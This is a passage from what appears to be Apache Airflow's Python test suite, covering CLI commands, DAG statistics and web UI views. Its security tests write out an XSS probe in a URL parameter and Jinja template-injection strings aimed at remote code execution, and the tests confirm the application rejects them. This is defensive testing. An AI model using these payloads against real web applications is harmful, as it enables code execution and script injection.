self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEquals(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEquals(dag_run.execution_date, utc_now)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
from airflow.www_rbac import app as application
configuration.load_test_config()
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test1', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@foo.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test2', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@apache.org', '-r', 'Viewer', '-p', 'test'
])
cli.create_user(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'create_user', '-u', 'test3', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@example.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
args = self.parser.parse_args([
'delete_user', '-u', 'test3',
])
cli.delete_user(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'create_user', '-u', 'user{}'.format(i), '-l', 'doe', '-f', 'jon',
'-e', 'jdoe+{}@gmail.com'.format(i), '-r', 'Viewer',
'--use_random_password'
])
cli.create_user(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.list_users(self.parser.parse_args(['list_users']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_sync_perm(self):
# test whether sync_perm cli will throw exceptions or not
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
